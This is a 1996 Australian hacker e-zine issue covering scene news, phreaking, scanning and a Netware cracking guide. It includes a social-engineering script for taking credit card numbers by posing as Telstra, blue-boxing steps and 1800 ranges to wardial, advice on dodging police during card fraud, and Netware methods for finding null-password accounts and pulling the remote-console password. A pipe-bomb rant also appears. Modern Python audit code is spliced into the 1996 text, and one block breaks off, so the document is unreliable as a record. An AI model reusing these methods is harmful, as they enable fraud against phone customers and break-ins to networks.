CyberLabs Digital Issue 04
-= Issue #4 14/8/96 =-
THE PROFESSIONAL EDITION
._---°--------------------------------------------------------°-_.
| [-Å-Å-Å-Å-Å-Å-Å-Å-Å-Å-Å-Å-cREW-Å-Å-Å-Å-Å-Å-Å-Å-Å-Å-Å-Å-Å-] |
| BlackHaze EDiTOR |
| Diceman C0-EDiTOR |
| MR MiLK NEWS |
| R|[o[HeT DiGiTaL k0URiER |
| LSD CHa0S C0DER/WRiTER |
| [-Å-Å-Å-Å-Å-Å-Å-Å-Å-Å-Å--WRiTERS-Å-Å-Å-Å-Å-Å-Å-Å-Å-Å-Å-Å-] |
| |
| Myst |
| aCiD XTReMe |
| MiNDWaRP |
| JET BLACK |
| PAiN_HZ |
| |
| [-Å-Å-Å-Å-Å-Å-Å-Å-Å-Å-Å-C0NTACT-Å-Å-Å-Å-Å-Å-Å-Å-Å-Å-Å-Å-] |
| SUBSCRiPTiONS: bend@st.nepean.uws.edu.au |
| SUGGESTiONS/SUBMiTTING ARTiCLES: bhaze@fl.net.au |
| diceman@fl.net.au |
| [-Å-Å-Å-Å-Å-Å-Å-Å-Å-Å-Å-Å-Å-Å-Å-Å-Å-Å-Å-Å-Å-Å-Å-Å-Å-Å-Å-] |
| KN0WLEDGE iS N0T A CRiME |
'----° CyberLabs Digital °---------------------------------------'
.____________________________________________________________________________.
-= Preface
Welcome To CyberLabs Digital issue #4. A lot has happened since previous issues
of CLD, we have gathered up new crew & now have a permanent home on #security
on OzNet. Not only have we strived to bring you quality HP articles this
issue, but we are trying desperately to unite the HP scene within Australia as
we feel that the time has come.
As you have already noticed, one major change is the removal of the reader.
And yes, it was cruddy, so from now on CLD will be sent out in ascii. Before
I forget to mention, diceman has taken over as co-editor!
In the covers of this issue, we have included some k-rad codez ;>, a netware
security article, a phreaking article on phreak, a story on the life, an
article on scanning, and finally a Java segment, amongst others.
An almighty thanks to all who contributed. Blah, enough said, let issue 4
begin!
BlackHaze & Diceman
.____________________________________________________________________________.
-= C0NTENTS
1. Subscribe ........................................... <CLD Staff>
2. Disclaimer .......................................... <CLD Staff>
3. Unite The Scene ..................................... <Bhaze/Diceman>
4. CLD News & Views .................................... <Mr_Milk>
5. Elite Speak ......................................... <BlackHaze>
6. Netware 3.1x/4.x Uebercracker Tips and Resources .... <Diceman>
7. Perl Exploit ........................................ <Diceman>
8. Scanning Made Easy .................................. <Myst>
9. OzPhreakin' ......................................... <aCidx>
10. #SECURiTY lame & weird quotes ....................... <#security>
11. The Basics of Sniffing .............................. <MindWarp>
12. Getting Trashed By The Cops ......................... < ANON ;) >
13. Java Security - Does Sun's new language promise
security risks on the Internet ...................... <BlackHaze>
14. neXt iSSUE .......................................... <CLD Staff>
.____________________________________________________________________________.
-= SUBSCRiBE =-
If you would like to subscribe to CyberLabs Digital Inc. Just follow these
instructions:
1. Send an email to "bend@st.nepean.uws.edu.au".
2. Leave the "Subject:" field of the email 'CyberLabs Subscription'
3. The first line of your email should read:
SUBSCRIBE CYBERLABS DIGITAL <your name here and email address>
.________. _____________________________________ ._____...
| G R E E | Z
|
| =- Mr Milk, Diceman, Nemesis, NiCkY, VOiD, Shaman -=
| =- Frog, Myst, Freedom, Stux, aCidx, Tusker, TWiliGHT -=
| =- Fusion, Data King & all the #security ppl on OzNet -=
'______________________________________________________________..
-= DiSCLAiMER
Blah.
- CLD Staff
-= Unite The Scene
-= By: CLD Staff
What was the last Australian hacking or phreaking home page you visited?
The chances are that over 90%+ of information resources that you use as a
hacker or phreaker will have come from the US. We constantly hear the question
"I have read all the US phreaking articles, does it work here?". At one point
in life everyone is a newbie, information does not need to be handed on a
silver platter, but as it stands there is little Australian related information
available. Fortunately there still stand many HP related boards in Oz; few
carry a substantial amount of information & for the ones which do you must have
access.
Have you noted that there appears to be no Australian HP scene?
The scene has always been there, only you had to look hard. Recent events
such as movies like 'HACKERS' have spawned newbies in their hundreds into
the scene. Media hype also plays an important role in how the scene is
influenced and people's interest. As many of us can see, the more active the
scene is the better!
With the HP scene slowly on the increase, so too is the rapid growth of the
warez scene. This is a pity to see & many of the k0uriez do nothing to
contribute to the HP scene, other than leech commercial software thinking
they are elite & carry huge egos. CLD does not hold anything against the
mass of warez groups within Oz, we would just like to see them somewhat
aid in lifting the HP scene off the ground for good.
Whether you have been at it for years or are just starting, everyone needs
information sources. We at CLD will strive to bring an important part of
this to you. CLD is not only about H/P, it is about researching topics and
building knowledge. We implore you to write your experiences down or part with
some of your knowledge, so that we will in turn achieve a greater technical
level within our articles. The end result of this can only be more knowledge.
CLD has moved through three issues. As each issue passes, the technical
content has improved significantly. It can be seen that CLD is growing in
many ways and we the editors hope that the readers will also grow with us. Now
is the time for people to share their ideas, to grow with each other.
The time is near for the HP scene to unite, we will be there aiding the scene
& hope you will join us in the long road ahead...
Cheers,
BlackHaze & Diceman
Editor/Co-Editor
.____________________________________________________________________________.
-= CLD NEWS & ViEWS
-= By: Souprd00d aka Mr_Milk & the CLD crew
Alrighty then...
I guess this is really the first news section that will
actually occupy more than a couple of lines. I decided that CLD needed a
decent section to cover little tidbits and other stuff like that. Hopefully
it will turn out ok. If you have any recent news relating to Aus HPA then
mail it to me at edjjs@alinga.newcastle.edu.au, and I will make sure it gets
printed here.
****/ KUA stamps Authority on AUS scene \***
(NOT!)
A couple of underground boards started cropping up as KUA distro's.
KUA are a supposed HPA group with the members Mr Hacker, HandS and Gothik.
Sound interesting?.... a HPA group in Australia too good to be true? yeah
probably. After checking out some of their releases with some of the #security
guys I found myself laughing as I had never laughed before. The topics were
covered in a couple of lines and everything was so vague and undescriptive (My
cat is a more elite hacker than you). Don't believe me? ok I will include a
golden example of what KUA is about.
----------------------------------begin KUA Gold----------------------------
How To Get VALID Credit Cards In OZ
===================================
Ever wonded how people got all the VALID credit card numbers from? Ok read on!
first ya get your white pages (or fonedisk) out and find a target :)
ring up the guy, and tell him/her ya r calling from Telstra and the billing
computer had crashed so all the info is lost, then ask him/her wat method
they used 2 pay for the fone bill last time, if they said Credit card then
say "Can I have the number and the expire date again please" they will normally
give it 2 ya.. so here ya go just got ya self a card..
umm thats it.. be careful and *** DO NOT *** spread this file 2 any public
or little lame board, I dont want some little lamers 2 know this!!
How To Rip Off A Slot Machine
=============================
theres a button at the back of poker machines which you press and it gives you
a jackpot (usually red or black) i presume its there to get all the money out
of the machine.
-Gothik & Mr Hacker-
KUA'96
----------------------------------end KUA Gold---------------------------------
[ed note: wow, KUA is thriving from such intelligence. NOT! Why not send KUA
a friendly little email... heheh, we know we will :) wup@ozemail.com.au]
Ok that was the ever popular credit card number/Slot Machine article, as you
can see it is streaming with depth and creativeness. If you think I am flaming
KUA as a group then you are mistaken. Australia needs hacking groups but you
need to ask yourself do we need groups like KUA with obvious minimal ability? Well
anyway whilst they are around I WILL continue to read their stuff not because
I will learn but because I will laugh every time they write another article...
WAREZ anyone? :>
-- Western Australian
Reporter: Peter Morris
AUSTRALIA'S 2.7 million analogue mobile phone users risk having their accounts
electronically stolen and bills in their names rung up for thousands of dollars,
according to two Perth men.
According to Telstra, the pair ran up a bill of more than $15,000 on an Adelaide
man's mobile phone over a six week period. Telstra has described it as
Australia's worst case of phone fraud.
The pair, Bob and Richard ( not their real names ) aged 20 and 19, say they
hacked into the mobile phone analogue network - a process known as phreaking -
"to prove how insecure the network is".
They "stole" the electronic signature from Adelaide signwriter Murray Goodes'
phone by modifying their own analogue phone to scan the network and catch the
electronic serial numbers (ESN) on to a computer as they were broadcast.
Using an old analogue phone and computer, together with freely available
software, the ESN was then programmed into the phone to enable it to access the
network masquerading as Mr Goodes' phone.
Bob and Richard say they were motivated by anger at Telstra's constant assurances
that the analogue network was secure.
"We were interested in how long it would take for Telstra to track us down. If we
wanted to avoid getting caught, it would have been very easy to cover our
tracks," Richard said.
The analogue system is the older of the two cellular phone networks operating in
Australia. The Federal Government has announced it will be closed by the end of
the century.
Mobile subscribers are being encouraged to use the newer and more secure digital
network. Suppliers say demand for analogue mobile phones has slowed dramatically
this year.
Telstra spokeswoman Lesley Tannerhill said consumers should be aware that the
potential for phreaking was limited to the analogue network and the company was
able to detect it.
She said customers whose phones were misused would not be liable for the bill.
Bob and Richard said they chose to steal a number from an Adelaide based
subscriber so it was clear to Telstra that Mr Goodes was not responsible for the
calls and so would not be forced to pay the bill.
Mr Goodes said he has been assured by Telstra that he would not be held liable
for the $5333 bill he received, more than $5000 over his normal monthly account.
As a sole proprietor he said he was dependent on the mobile phone for work and
there had been a noticeable drop-off in business last month - he estimated a 60
per cent fall.
"I don't think they understand the damage they can do to people's business," Mr
Goodes said.
Bob and Richard used the phone freely for six weeks before being raided by the
Australian Federal Police about two weeks ago. No charges have been laid.
They used the phone about 18 hours a day, mostly calling overseas including sex
chat lines in Israel.
Easy picking for security experts
---------------------------------
TO THE casual observer, Bob and Richard look like a couple of successful
20-somethings: well-dressed and easily able to supplement their bachelor eating
habits with regular splashes at expensive restaurants.
The outward appearance accurately reflects their professional lives as computer
security consultants whose skills are so highly sought-after they have the
potential to earn well over $100,000 a year.
"We work pretty much how and when we want," Richard said.
Both started university but left in the first year when they found the learning
experience on campus too slow.
They see phreaking (getting free use of telephones) and hacking into computer
systems as inextricably linked.
Having developed a childhood fascination with the technology, they now see
hacking as the fastest way to keep updating their skills.
And while there may be a great deal of scepticism among computer system operators
about their motivation, Nick Chantler, an army counter-intelligence instructor
who has completed a major study of hackers, said this thirst to learn more about
systems was common.
"The vast majority of them are not evil, they just want to increase their
knowledge," he said.
But he said sometimes this enthusiasm could overwhelm their ethical constraints.
After years researching hackers, Dr Chantler has enormous respect for the
knowledge and ability elite hackers have, something he believes many big
organizations are completely blind to.
"There is nothing they can't do if they set their minds to it," he said. "The
elite hackers could bring Australia to its knees."
He said that throwing the book at phreakers and hackers was not the answer
because of the damage they could wreak.
"What I would be doing with these guys is to quietly pull them aside and try to
learn as much as I could about what they know," Dr Chantler said.
Pipe Bomb explodes in boys hand
-------------------------------
I was watching WIN television one night while on IRC, why the hell I was watching
WIN I don't know! And as usual the 10:45 news appears, and lo and behold
Pipe bomb explodes in boys hand...
Stunned, I turned around & watched the news and to my utter amazement I was
shocked at how lame this teenager was... using a hammer with a pipe bomb? wow,
that just proves his vast intelligence HA. Not only did the media over hype this
story they also had to relate it to the bomb blast in Atlanta. Now as usual the
media needed a ground-breaking story, so of course what do they do is
The internet is to be blamed, as files on illegal bomb construction can be found.
By this stage I was furious, i felt like physically driving down to the scene &
lob a few hundred pipe bombs outa my cars window, while yelling 'This is how you
make a pipe bomb lamer!' whilst several WIN camera men are sent flying through the
air.
I guess that some loser of a politician will bring the matter up in parliament
it will be a great surprise if any action will be actually taken, besides they
can't do a simple thing. Well let's hope not.
Anyhow, we find that constructing pipe bombs is one of the dumbest things, &
always the lamers are the ones who find themselves fuqd' up in the end. Along
with all the try-hard Anarchist groups within Oz & lamers bragging about how damm
gewd they are at constructing explosives, there's no hope :)
049 gets busted, well almost!
-----------------------------
During last month ( maybe this month too) Federal Police were in Newcastle
to help local ISP's (hunterlink) and national Point-Of-Presences
(ozemail access1 etc.) riddle out credit card fraud. Obviously with the
easiness of fake accounting something would need to be done to weed them out.
No arrests have been made yet involving credit card fraud on the ISP but I
guess it will only be time before some WaReZ kiddie goes down. So just a
warning anyone using Newcastle ISP's or even anyone in NSW lay off the credit
cards for a while at least as the beer gut bad boys are in town.
One person has been arrested already regarding ordering $1000 of goods
from a local store from a fake credit card that he got from the Internet. This
is what initially started the interest in credit card fraud.. I am sure the
Fedz will be looking for more heads so don't let it be you.
Sticking with credit card fraud there are enormous rumors that Ozemail
have the Fedz helping them catch kiddies using fake cc#'s. So again lay off
with the fraud for a while.
Boards springing up over the country
------------------------------------
A large number of HPA related BBS's are starting to crop up. Although alot
only have a minimal filebase and no decent msg areas going it is good to
see that an underground is starting to form. If you are a sysop of a HPA
related BBS, keep going and keep putting in an effort to make your bbs elite.
The Blue Box Myth
-----------------
I am sick and tired of hearing on irc that Blue Boxing in Australia is dead.
Sure most of Australian telephone switching system is already converted to
digital and it is impossible to blue box within Australia. HOWEVER the way
to successfully blue box in Australia is to first call another country that
has a shithouse phone system and bad connection to Australia. You call another
country using the 1800 country direct numbers (1800 881 ***) these will connect
you to another country's fone exchange for FREE. Alright most are robotised
and allow you to make calls using a calling card or some even a credit card
you can bail out now and just use your fake cc #'s etc to dial back into
Australia for free calls. However if you don't want to get caught easily you
can blue box your way back into Australia. To do this you will need a tone
generator, scavenger is a good start.. or even BlueBeep will do. Ok set up
a simple two tone sound of 2400+2600 and then 2400... I will leave the timing
and volume up to you... but after you hear a chirp when dialing the country
direct number you send the seize tones down.. you should hear the tones played
back to you... if this is the case you have a successful seize and all you
have to do is usually dial KP2+country code+0 + number + ST and it will work.
If it hangs up on you when you play the tone, it means that the timing is too
long and you should adjust it. Also volume is important so tweak away with it
as well.
So it is possible to blue box within australia you just have to use a
cheap country like Aruba to help you on your way.
SUMMARY:dial country direct to distant country.
seize line
dial back in Australia
Hacking in Australia
--------------------
There are many 1800 numbers that can be scanned with a program such as ToneLoc or
TheScan. Good exchanges to start on are the 1800 801 *** and 1800 124 ***.
These have many carriers and can be a good starting point.
These are all Carriers and contain some decent computers. Have a look and see
them for yourself... hey they aren't costing you anything.
CONCLUSION:
Ok that wraps up my first attempt at a news article... so hope you
liked it etc. and I will catcha in the next issue. Remember the Aus HPA scene
needs you to grow!
.__________________________________________________________________________.
Elite Speak should compile under any unix platform or PC. You will have to
call ExitToShell() rather than exit() to compile under SIOUX ansi c.
/* Elite Speak
   Author: CLD Crew - bhaze@fl.net.au
   Date: 8/13/96
   Version: 1.1
   Usage:
   > type the required text here
   >> +Yp3 +h3 R3qu1r3d +3x+ h3R3
*/
#include <stdio.h>
#include <stdlib.h>   /* exit() */

/* Returns 1 if pass is an upper-case ASCII letter (A-Z). */
int upper(char pass)
{
    if((pass <= 90) && (pass >= 65)) return 1;
    else return 0;
}

/* Returns 1 if pass is a lower-case ASCII letter (a-z). */
int lower(char pass)
{
    if((pass <= 122) && (pass >= 97)) return 1;
    else return 0;
}

int main(void) {
    int ChangeToUpper = -32, ChangeToLower = 32;
    /* Letters to replace: 'E', 'O', 'I' (upper case), 's', 't' (lower case). */
    int HE = 69, HO = 79, HI = 73, HS = 115, HT = 116;
    /* Replacement characters: '1', '3', '0', '5', '+'. */
    int H1 = 49, H3 = 51, H0 = 48, H5 = 53, Ht = 43;
    char buffa[100];
    int NumOfChars = 0,count = 0,scuz = 0;
    int c;

    printf("\n");
    printf("3L1+3 5p3Ak V3r510n 1.1 - By th3 CLD cr3w bhaze@fl.net.au \n \n");
    printf("> ");
    /* Read one line: stop at a control character (newline), EOF or a full buffer. */
    while((NumOfChars < 100) && ((c = getchar()) >= 32)) {
        buffa[NumOfChars] = (char)c;
        NumOfChars++;
    }
    printf("\n");
    printf(">> ");
    while(count < NumOfChars) {
        /* Substitute e, o, i, t and s, in either case. */
        if((buffa[count] == HE) || (buffa[count] == (HE + ChangeToLower))) {
            buffa[count] = H3;
        }
        if((buffa[count] == HO) || (buffa[count] == (HO + ChangeToLower))) {
            buffa[count] = H0;
        }
        if((buffa[count] == HI) || (buffa[count] == (HI + ChangeToLower))) {
            buffa[count] = H1;
        }
        if((buffa[count] == HT) || (buffa[count] == (HT + ChangeToUpper))) {
            buffa[count] = Ht;
        }
        if((buffa[count] == HS) || (buffa[count] == (HS + ChangeToUpper))) {
            buffa[count] = H5;
        }
        /* Flip the case of every fourth character, starting with the second. */
        if ((scuz == 1) && (upper(buffa[count]))) {
            buffa[count] = buffa[count] + ChangeToLower;
        }
        else if ((scuz == 1) && (lower(buffa[count]))) {
            buffa[count] = buffa[count] + ChangeToUpper;
        }
        if (scuz < 3) {scuz ++;}
        else scuz = 0;
        printf("%c",buffa[count]);
        count++;
    }
    printf("\n");
    getchar();   /* wait for a key press before exiting */
    exit(0); //ExitToShell <--- Use for SIOUX ANSI C.
}
.____________________________________________________________________________.
Diceman's Netware 3.1x and 4.x Uebercracker Tips and Resources
==============================================================
by diceman@fl.net.au
CONTENTS
========
Getting a feel for the Network
Netware Three
Netware Four
How a Uebercracker gets Supervisor rights
How a Uebercracker keeps his rights
Where are those error logs and what do they log ?
A listing of utilities to penetrate Novell Netware - some of the things that
are possible.
==============================================================================
This was written at the beginning of 1995, as a reference guide for
myself. Since then it has not been updated, due to the fact that I have moved
to unix. Despite this, to all the die hard unix hackers, the fact is that
88% of the top 1000 fortune companies use novell netware, that counts for
something ;>.
I have tried to include original information, which has succeeded to a degree.
The introduction to netware security is, I believe, a first.
Also this file contains no specific version 4 hacking, thus its usefulness
may be limited. Note that it is still an excellent reference for people new to
netware.
Obviously, information has been taken from sources; credit has been intended
to be given. A special note for the Netware Hacking FAQ by Simple Nomad is
in order.
==============================================================================
Getting a feel for the Network
==============================
1. NETWARE THREE
================
How many servers are there ?
----------------------------
It is always good to know how many servers there are on the network you are
on. The simple command "slist" will perform this, you do not need to be logged
in. The file should usually be held at sys:login\slist.exe. Notice in the
status column that servers can be default and attached, if you are logged into
the network.
Here is the output :
Known NetWare File Servers     Network   Node Address Status
--------------------------     -------   ------------ ------
ECHIDNA                        [   A0001][           1]Attached
HAKEA                          [    FACA][           1]
MELAB                          [   BAD1E][           1]
MEOFF                          [    D1ED][           1]
MOFF                           [       2][           4]
MOTHER                         [  FADED0][           1]
NURSING_1                      [     256][           1]Default
PDU                            [     30A][           1]
PRFMIS                         [   BEAD1][           1]
RECORDS                        [    ABBA][           1]
SERVER1                        [  1B0000][           1]
[Snip]
Total of 35 file servers found
The Login Script
----------------
This file, the "login script", is processed by everyone who logs into the
network as opposed to attaching. It is held at sys:\public\net$log.dat. This
file is in clear text, and if you have the rights, can be edited. The file
often shows batch files that will be processed by certain users. It is good to
review these files to see how the network is managed and what programs are
loaded.
Notice the "exit" at the end of the file. If this command is not issued, then
individuals can utilise personal login scripts.
Here is an example (my creation ;>):
pccompatible
map display off
rem ---------------------------------------------------------------------
rem User drive mappings
map errors off
if member of "lockout" then exit "lockout"
if login_name is "supervisor" then begin
map r j:=sys:user\other
else
map r j:=sys:user\%login_name
end
map errors on
rem ---------------------------------------------------------------------
rem Other mappings
map f:=sys:default
map r m:=sys:data
map r INS s1:=sys:public
map r INS s2:=sys:programs\%smachine\%os_version
map r INS s3:=sys:std
comspec=s2:command.com
rem --------------------------------------------------------------------
rem Special logins
if login_name is "PRINTER" then exit "prn-user"
if login_name="FAXHQ" then exit "faxhq"
if login_name="ANYWHERE" then exit "pcany"
if login_name="backup" then exit "emerald"
if login_name="asc" then exit "command /c asc"
rem ---------------------------------------------------------------------
rem Start screen displays
write
write "Good ";greeting_time;", ";full_name;"."
write "It's ";day_of_week;", ";day;" ";month_name;", ";year;", and the time is ";hour;":";minute;" ";am_pm;"."
write "You are now logged on at station ";station;"."
write
set prompt = "$P$G"
set name = "%LOGIN_NAME"
set wp51name = "%FULL_NAME"
if member of "BTSG" then set BTS = "G1"
rem -------------------------------------------------------------------------
rem Set printer capturing
#capture l=1 q=printq_0 nt nb nff ti10
#capture l=2 q=printq_1 nt nb nff ti10
rem ---------------------------------------------------------------------
rem Special Group conditions
if member of "wbmas" then map q:=sys:wbmas
if member of "audit" then map k:=sys:audit
if member of "it" then exit "it"
exit "mlk"
The autoexec.ncf
----------------
The autoexec.ncf is one of the two startup files for the netware server the
other being startup.ncf. Here is one of my creations:
rem -----------------------------------------------------------------------
file server name hack
ipx internal net B00B
rem -----------------------------------------------------------------------
REM BINDING IPX TO THE ETHERNET BOARD
rem load ethertsm
load ne1000 port=300 int=3 frame=Ethernet_II name=hacknet
bind ipx hacknet net=1
rem -----------------------------------------------------------------------
REM BINDING TCPIP TO THE ETHERNET BOARD
load snmp
load tcpip rip=no
bind ip hacknet ad=129.1.0.3 ma=255.255.255.0
rem -----------------------------------------------------------------------
REM LOADING DISK DRIVERS
load isadisk port=1F0 int=E
rem -----------------------------------------------------------------------
REM MOUNTING ALL HARD DRIVES
mount all
rem -----------------------------------------------------------------------
REM LOAD A FEW LOGS - AFTER CLIB HAS BEEN AUTO LOADED BY TCPIP - AND SYS MOUNTED
load c:\server.312\conlog.nlm
load c:\server.312\snmplog.nlm
rem -----------------------------------------------------------------------
REM SECURITY
secure console
remove dos
set allow unencrypted passwords = off
rem -----------------------------------------------------------------------
REM LOADING BASIC NLMS FOR OPERATION
search add c:\server.312
rem load streams - AUTO LOADED BY TCPIP
rem load clib - AUTO LOADED BY TCPIP
load nut
load mathlib
load tli
load ipxs
load spxs
load remote remote
rem the above line sets the remote console (sys:\system\rconsole.exe) passwd
load rspx
rem load pserver pserver
load monitor P NH
rem -----------------------------------------------------------------------
REM LOAD ADD ON NLMS
search add c:\server.312\nlms
load eventmon -l sys:etc\eventmon.log -a
load nwshell
rem -----------------------------------------------------------------------
This is one of the most important files for the netware server. It could be
located in two positions: either c:\server.312\autoexec.ncf (or similar) or
sys:\system\autoexec.ncf. This positioning is very important, due to the fact
that to access it on c: is a lot harder than on sys:. For example, if the sys
admin has left himself logged in, a simple "type sys:\system\autoexec.ncf"
retrieves the rconsole password, and thus all security levels have been breached.
The autoexec.ncf tells the netware server what nlms to load upon startup.
Note that conlog.nlm is loaded, this is described below. Also eventmon, which
monitors all changes in the file system and the bindery.
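An added example, not part of the original article: a Python check an administrator could run over a copy of autoexec.ncf to find the exposure described above (a clear-text "load remote" password, made worse when the file sits on SYS:). The sample file, the finding names and the function names are constructed for illustration.

```python
import re

# Constructed sample modelled on the autoexec.ncf shown above; not a real server's file.
SAMPLE_NCF = r"""file server name hack
ipx internal net B00B
rem load ethertsm
load ne1000 port=300 int=3 frame=Ethernet_II name=hacknet
bind ipx hacknet net=1
load c:\server.312\conlog.nlm
secure console
set allow unencrypted passwords = off
load remote remote
rem load pserver pserver
load monitor P NH
"""

# Hardening commands the article's file issues under "REM SECURITY".
HARDENING = {
    "secure console": r"secure\s+console",
    "remove dos": r"remove\s+dos",
    "unencrypted passwords off": r"set\s+allow\s+unencrypted\s+passwords\s*=\s*off",
}

# "load remote <arg>": the argument is the remote console password in clear text.
LOAD_REMOTE = re.compile(r"load\s+(?:\S*[\\:/])?remote(?:\.nlm)?\s+(\S+)", re.I)


def active_lines(text):
    """Return (line_number, stripped_line) pairs, skipping blanks and rem comments."""
    out = []
    for number, raw in enumerate(text.splitlines(), start=1):
        line = raw.strip()
        if line and not re.match(r"rem(\s|$)", line, re.I):
            out.append((number, line))
    return out


def audit_ncf(text, location):
    """Return a list of (finding, line_number) tuples; line 0 means 'whole file'.

    The password itself is never copied into the findings.
    """
    lines = active_lines(text)
    findings = []
    for number, line in lines:
        m = LOAD_REMOTE.match(line)
        # Assumption: an argument starting with '-' is an option, not a password.
        if m and not m.group(1).startswith("-"):
            findings.append(("cleartext-rconsole-password", number))
            # The article's point: a copy on SYS: can be read from any
            # workstation session that has rights to sys:\system.
            if location.lower().startswith("sys:"):
                findings.append(("password-readable-from-volume", number))
    for name, pattern in HARDENING.items():
        if not any(re.fullmatch(pattern, line, re.I) for _, line in lines):
            findings.append(("missing: " + name, 0))
    return findings


if __name__ == "__main__":
    for where in (r"sys:\system\autoexec.ncf", r"c:\server.312\autoexec.ncf"):
        print(where)
        for finding, line in audit_ncf(SAMPLE_NCF, where):
            print("  line %d: %s" % (line, finding))
```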
Who are the users, and what is the structure of the groups
----------------------------------------------------------
By default every new user created on the novell network is added to the group
everyone. By entering the program "syscon", held usually at
sys:public\syscon.exe, a complete listing of users and groups can be found.
An easy way to get all the users and groups to an ascii text file is through
the use of third party utils.
Use the utility grplist.exe to retrieve a listing of groups or a full listing
of users.
For example the command:
grplist {server}\everyone - provides a listing of all users in the group
everyone.
grplist - provides a listing of all users on a server.
Which users do not have passwords
---------------------------------
Login as any user. Use the utility "chknull" by itsme, this will return a
listing of users with null passwords.
02000002 0001 ANYWHERE HAS a NULL password
04000002 0001 ASC HAS a NULL password
2b000001 0001 MIDBACK HAS a NULL password
36000001 0001 PRINTER HAS a NULL password
3b000002 0001 TEMP HAS a NULL password
3e000001 0007 PSERVER HAS a NULL password
The pserver can not be logged into from the login prompt. To see what rights
these userids have, "attach {username}" instead of logging in. Beware if
accounting is installed.
Are the default accounts still in existence
-------------------------------------------
Upon installation Netware 3.1x creates two users:
Supervisor
Guest
What rights do I have
---------------------
It is important to see what rights your userid has. The commands "rights,
whoami and list" are particularly useful.
Rights - by itself tells the user what rights they have in the default
directory.
FS3\SYS:
Your Effective Rights for this directory are [SRWCEMFA]
You have Supervisor Rights to Directory. (S)
* May Read from File. (R)
* May Write to File. (W)
May Create Subdirectories and Files. (C)
May Erase Directory. (E)
May Modify Directory. (M)
May Scan for Files. (F)
May Change Access Control. (A)
* Has no effect on directory.
Entries in Directory May Inherit [SRWCEMFA] rights.
You have ALL RIGHTS to Directory Entry.
Whoami - normally tells the user which login id they are using. Whoami is also
useful to:
whoami /g - lists the groups you belong to.
whoami /r - lists your effective rights in the network directory structure.
whoami /s - lists your security equivalences.
whoami /a - lists the groups, security equivalences, and your effective rights.
Tlist - displays the user's trustee rights and their effective rights.
Listdir /e - displays effective rights of all subdirectories.
Ok, what do these rights mean?
The Eight Netware Rights
------------------------
S Supervisory: Once granted to a user or group on a specific directory, this
right gives the trustee holding it all rights, as well as the ability to grant
all rights to other users or user groups on that directory and its
subdirectories. The supervisory right itself is automatically propagated for the
trustee holding it to all subdirectories below the one where it was granted,
and it cannot be revoked for the trustee from subdirectories below the
original assignment. It also overrides any restrictions put in place by the
Netware Inherited Rights Mask. At the file level, it allows a user all rights
to the file - and the ability to grant or modify any right to any file for any
user or group in any directory at or below the directory where the supervisory
rights were assigned.
R Read: This right allows a user or group to open a file for reading or to run
an executable program.
W Write: Allows a user or group to open and modify a file's contents.
C Create: At the directory level, Create allows a user or group to make
subdirectories and files within them. If this right is the only one granted at
the directory level, it allows the trustee holding it to create subdirectories
and files. But once a file is closed, it cannot be seen using standard DOS or
Netware commands( for example DIR or NDIR ).
E Erase: Controls whether or not a directory, its subdirectories and the files
within the directory and subdirectories can be deleted.
M Modify: Users or groups with this right have the ability to set and change
file or directory attributes. This includes renaming directories or files
within directories. This trustee right has no effect on the ability to modify
the contents of a file.
F File Scan: Users or groups must have this trustee right to see that
directories or files within directories exist.
A Access Control: This right allows a user to modify the trustee assignments or
the Inherited Rights Mask of a directory or file. It does not allow a user to
grant the supervisory trustee right, but it does allow them to grant trustee
rights to others that they themselves do not have.
What Rights does it take to ?
-----------------------------
Rights for Common File and Directory Tasks

Task                                  Rights required
------------------------------------  ------------------------------
Read from a closed file               Read
See a file name                       File Scan
Search a directory for file           File Scan
Write to closed file                  Write, Create, Erase, Modify
Execute an EXE file                   Read, File Scan
Create and write to a file            Create
Copy files from a directory           Read, File Scan
Make a new directory                  Create
Delete a file                         Erase
Salvage deleted files                 Read, Write, Create, File Scan
                                      and Create at directory level
Change directory or file attributes   Modify
Rename a file or directory            Modify
Change the Inherited Rights Mask      Access Control
Change trustee assignments            Access Control
Modify a directory's disk space       Access Control
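The rights letters and the task table above can be turned into a small calculator an administrator can use to see what an account may do in a directory where it holds no explicit assignment. This is an added example, not code from the original article. It assumes the usual NetWare 3.x inheritance model (a trustee assignment in a directory replaces what would be inherited, otherwise the parent's rights pass through the Inherited Rights Mask, and Supervisory cannot be masked); all function names are hypothetical.

```python
# Added example: simplified model of NetWare 3.x directory rights.
# Assumption: the caller has already merged the user's own trustee
# assignments with those of its groups and security equivalences.
ALL_RIGHTS = frozenset("SRWCEMFA")

# Rights needed per task, taken from the table in the article
# ("Salvage deleted files" is left out because it mixes file and directory level).
TASK_RIGHTS = {
    "read from a closed file": "R",
    "see a file name": "F",
    "search a directory for file": "F",
    "write to closed file": "WCEM",
    "execute an exe file": "RF",
    "create and write to a file": "C",
    "copy files from a directory": "RF",
    "make a new directory": "C",
    "delete a file": "E",
    "change directory or file attributes": "M",
    "rename a file or directory": "M",
    "change the inherited rights mask": "A",
    "change trustee assignments": "A",
    "modify a directory's disk space": "A",
}


def parse_rights(text):
    """Turn 'RCWEMF' or '[SRWCEMFA]' into a set, rejecting unknown letters."""
    letters = frozenset(text.upper()) - frozenset("[]- ")
    unknown = letters - ALL_RIGHTS
    if unknown:
        raise ValueError("unknown rights letters: " + "".join(sorted(unknown)))
    return letters


def normalise(path):
    """'sys:mail\\1' -> 'SYS:/MAIL/1' so dictionary keys compare reliably."""
    parts = path.upper().replace("\\", "/").replace(":", ":/").split("/")
    return "/".join(part for part in parts if part)


def effective_rights(path, trustees, masks=None):
    """Walk from the volume root down to path and return the effective rights.

    trustees: {directory: rights} explicit assignments for the account
    masks:    {directory: rights} Inherited Rights Masks (missing = all rights)
    """
    trustees = {normalise(k): parse_rights(v) for k, v in trustees.items()}
    masks = {normalise(k): parse_rights(v) for k, v in (masks or {}).items()}
    current = frozenset()
    walked = []
    for part in normalise(path).split("/"):
        walked.append(part)
        here = "/".join(walked)
        if "S" in current:
            continue  # Supervisory propagates down and ignores masks
        if here in trustees:
            current = trustees[here]  # explicit assignment replaces inheritance
        else:
            current = current & masks.get(here, ALL_RIGHTS)
        if "S" in current:
            current = ALL_RIGHTS
    return current


def missing_rights(task, rights):
    """Return the rights letters still needed for a task ('' means allowed)."""
    needed = parse_rights(TASK_RIGHTS[task.lower()])
    return "".join(sorted(needed - rights))


# Constructed scenario: a low-privilege account with Create on SYS:MAIL and
# full file rights only in its own mail directory.
GUEST_TRUSTEES = {"SYS:MAIL": "C", "SYS:MAIL\\C0003043": "RCWEMF"}

if __name__ == "__main__":
    rights = effective_rights("SYS:MAIL\\1", GUEST_TRUSTEES)
    print("effective rights in SYS:MAIL\\1:", "".join(sorted(rights)) or "none")
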